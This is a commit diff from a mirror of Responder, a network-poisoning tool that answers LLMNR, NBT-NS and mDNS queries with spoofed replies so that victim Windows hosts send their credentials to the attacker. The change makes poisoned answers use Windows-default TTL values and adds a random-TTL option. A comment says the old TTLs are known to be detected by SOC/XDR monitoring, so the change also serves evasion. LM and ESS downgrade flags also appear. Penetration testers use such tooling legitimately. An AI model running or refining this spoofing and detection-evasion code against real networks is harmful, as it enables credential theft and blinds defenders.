github/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2025-07-06 04:51:23 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Added default mode for TTL option

Browse source
This commit is contained in:
lgandx 2024-05-14 11:02:35 -03:00
parent 116a056e7d
commit 4947ae6e52
7 changed files with 40 additions and 14 deletions
Download patch file Download diff file Expand all files Collapse all files

2
Responder.py
View file

@ -45,7 +45,7 @@ parser.add_option('-Q','--quiet', action="store_true", help="Tell Resp
parser.add_option('--lm', action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False) parser.add_option('--lm', action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
parser.add_option('--disable-ess', action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False) parser.add_option('--disable-ess', action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False)
parser.add_option('-v','--verbose', action="store_true", help="Increase verbosity.", dest="Verbose") parser.add_option('-v','--verbose', action="store_true", help="Increase verbosity.", dest="Verbose")
parser.add_option('-t','--ttl', action="store", help="Configure the TTL in the victim cache. Value in hex (30 seconds = 1e)", dest="TTL", metavar="1e", default=None) parser.add_option('-t','--ttl', action="store", help="Change the default Windows TTL for poisoned answers. Value in hex (30 seconds = 1e). use '-t random' for random TTL", dest="TTL", metavar="1e", default=None)
options, args = parser.parse_args() options, args = parser.parse_args()
if not os.geteuid() == 0: if not os.geteuid() == 0:

10
packets.py
View file

@ -52,7 +52,7 @@ class NBT_Ans(Packet):
("NbtName", ""), ("NbtName", ""),
("Type", "\x00\x20"), ("Type", "\x00\x20"),
("Classy", "\x00\x01"), ("Classy", "\x00\x01"),
("TTL", "\x00\x00\x00\xa5"), ("TTL", "\x00\x04\x93\xe0"), #TTL: 3 days, 11 hours, 20 minutes (Default windows behavior)
("Len", "\x00\x06"), ("Len", "\x00\x06"),
("Flags1", "\x00\x00"), ("Flags1", "\x00\x00"),
("IP", "\x00\x00\x00\x00"), ("IP", "\x00\x00\x00\x00"),
@ -263,7 +263,7 @@ class LLMNR_Ans(Packet):
("AnswerNameNull", "\x00"), ("AnswerNameNull", "\x00"),
("Type1", "\x00\x01"), ("Type1", "\x00\x01"),
("Class1", "\x00\x01"), ("Class1", "\x00\x01"),
("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec. ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec (Default windows behavior)
("IPLen", "\x00\x04"), ("IPLen", "\x00\x04"),
("IP", "\x00\x00\x00\x00"), ("IP", "\x00\x00\x00\x00"),
]) ])
@ -292,7 +292,7 @@ class LLMNR6_Ans(Packet):
("AnswerNameNull", "\x00"), ("AnswerNameNull", "\x00"),
("Type1", "\x00\x1c"), ("Type1", "\x00\x1c"),
("Class1", "\x00\x01"), ("Class1", "\x00\x01"),
("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec. ("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec (Default windows behavior).
("IPLen", "\x00\x04"), ("IPLen", "\x00\x04"),
("IP", "\x00\x00\x00\x00"), ("IP", "\x00\x00\x00\x00"),
]) ])
@ -316,7 +316,7 @@ class MDNS_Ans(Packet):
("AnswerNameNull", "\x00"), ("AnswerNameNull", "\x00"),
("Type", "\x00\x01"), ("Type", "\x00\x01"),
("Class", "\x00\x01"), ("Class", "\x00\x01"),
("TTL", "\x00\x00\x00\x78"),##Poison for 2mn. ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn (Default windows behavior)
("IPLen", "\x00\x04"), ("IPLen", "\x00\x04"),
("IP", "\x00\x00\x00\x00"), ("IP", "\x00\x00\x00\x00"),
]) ])
@ -338,7 +338,7 @@ class MDNS6_Ans(Packet):
("AnswerNameNull", "\x00"), ("AnswerNameNull", "\x00"),
("Type", "\x00\x1c"), ("Type", "\x00\x1c"),
("Class", "\x00\x01"), ("Class", "\x00\x01"),
("TTL", "\x00\x00\x00\x78"),##Poison for 2mn. ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn (Default windows behavior)
("IPLen", "\x00\x04"), ("IPLen", "\x00\x04"),
("IP", "\x00\x00\x00\x00"), ("IP", "\x00\x00\x00\x00"),
]) ])

12
poisoners/LLMNR.py
View file

@ -76,7 +76,11 @@ class LLMNR(BaseRequestHandler): # LLMNR Server class
}) })
elif LLMNRType == True: # Poisoning Mode elif LLMNRType == True: # Poisoning Mode
Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL) #Default:
if settings.Config.TTL == None:
Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
else:
Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL)
Buffer1.calculate() Buffer1.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address) soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
if not settings.Config.Quiet_Mode: if not settings.Config.Quiet_Mode:
@ -90,7 +94,11 @@ class LLMNR(BaseRequestHandler): # LLMNR Server class
}) })
elif LLMNRType == 'IPv6' and Have_IPv6: elif LLMNRType == 'IPv6' and Have_IPv6:
Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL) #Default:
if settings.Config.TTL == None:
Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
else:
Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL)
Buffer1.calculate() Buffer1.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address) soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
if not settings.Config.Quiet_Mode: if not settings.Config.Quiet_Mode:

14
poisoners/MDNS.py
View file

@ -73,7 +73,11 @@ class MDNS(BaseRequestHandler):
}) })
elif MDNSType == True: # Poisoning Mode elif MDNSType == True: # Poisoning Mode
Poisoned_Name = Poisoned_MDNS_Name(data) Poisoned_Name = Poisoned_MDNS_Name(data)
Buffer = MDNS_Ans(AnswerName = Poisoned_Name, TTL=settings.Config.TTL) #Use default:
if settings.Config.TTL == None:
Buffer = MDNS_Ans(AnswerName = Poisoned_Name)
else:
Buffer = MDNS_Ans(AnswerName = Poisoned_Name, TTL=settings.Config.TTL)
Buffer.calculate() Buffer.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address) soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
if not settings.Config.Quiet_Mode: if not settings.Config.Quiet_Mode:
@ -85,9 +89,13 @@ class MDNS(BaseRequestHandler):
'AnalyzeMode': '0', 'AnalyzeMode': '0',
}) })
elif MDNSType == 'IPv6'and Have_IPv6: # Poisoning Mode elif MDNSType == 'IPv6' and Have_IPv6: # Poisoning Mode
Poisoned_Name = Poisoned_MDNS_Name(data) Poisoned_Name = Poisoned_MDNS_Name(data)
Buffer = MDNS6_Ans(AnswerName = Poisoned_Name) #Use default:
if settings.Config.TTL == None:
Buffer = MDNS6_Ans(AnswerName = Poisoned_Name)
else:
Buffer = MDNS6_Ans(AnswerName = Poisoned_Name, TTL= settings.Config.TTL)
Buffer.calculate() Buffer.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address) soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
if not settings.Config.Quiet_Mode: if not settings.Config.Quiet_Mode:

5
poisoners/NBTNS.py
View file

@ -44,7 +44,10 @@ class NBTNS(BaseRequestHandler):
'AnalyzeMode': '1', 'AnalyzeMode': '1',
}) })
else: # Poisoning Mode else: # Poisoning Mode
Buffer1 = NBT_Ans(TTL=settings.Config.TTL) if settings.Config.TTL == None:
Buffer1 = NBT_Ans()
else:
Buffer1 = NBT_Ans(TTL=settings.Config.TTL)
Buffer1.calculate(data) Buffer1.calculate(data)
socket.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address) socket.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
if not settings.Config.Quiet_Mode: if not settings.Config.Quiet_Mode:

6
settings.py
View file

@ -175,8 +175,12 @@ class Settings:
# TTL blacklist. Known to be detected by SOC / XDR # TTL blacklist. Known to be detected by SOC / XDR
TTL_blacklist = [b"\x00\x00\x00\x1e", b"\x00\x00\x00\x78", b"\x00\x00\x00\xa5"] TTL_blacklist = [b"\x00\x00\x00\x1e", b"\x00\x00\x00\x78", b"\x00\x00\x00\xa5"]
# Random TTL # Lets add a default mode, which uses Windows default TTL for each protocols (set respectively in packets.py)
if options.TTL is None: if options.TTL is None:
self.TTL = None
# Random TTL
elif options.TTL.upper() == "RANDOM":
TTL = bytes.fromhex("000000"+format(random.randint(10,90),'x')) TTL = bytes.fromhex("000000"+format(random.randint(10,90),'x'))
if TTL in TTL_blacklist: if TTL in TTL_blacklist:
TTL = int.from_bytes(TTL, "big")+1 TTL = int.from_bytes(TTL, "big")+1

5
utils.py
View file

@ -559,7 +559,10 @@ def StartupMessage():
print(' %-27s' % "Don't Respond To" + color(str(settings.Config.DontRespondTo), 5, 1)) print(' %-27s' % "Don't Respond To" + color(str(settings.Config.DontRespondTo), 5, 1))
if len(settings.Config.DontRespondToName): if len(settings.Config.DontRespondToName):
print(' %-27s' % "Don't Respond To Names" + color(str(settings.Config.DontRespondToName), 5, 1)) print(' %-27s' % "Don't Respond To Names" + color(str(settings.Config.DontRespondToName), 5, 1))
print(' %-27s' % "TTL for poisoned response" + color(str(settings.Config.TTL.encode().hex()) + " ("+ str(int.from_bytes(str.encode(settings.Config.TTL),"big")) +" seconds)", 5, 1)) if settings.Config.TTL == None:
print(' %-27s' % "TTL for poisoned response "+ color('[default]', 5, 1))
else:
print(' %-27s' % "TTL for poisoned response" + color(str(settings.Config.TTL.encode().hex()) + " ("+ str(int.from_bytes(str.encode(settings.Config.TTL),"big")) +" seconds)", 5, 1))
print('') print('')
print(color("[+] ", 2, 1) + "Current Session Variables:") print(color("[+] ", 2, 1) + "Current Session Variables:")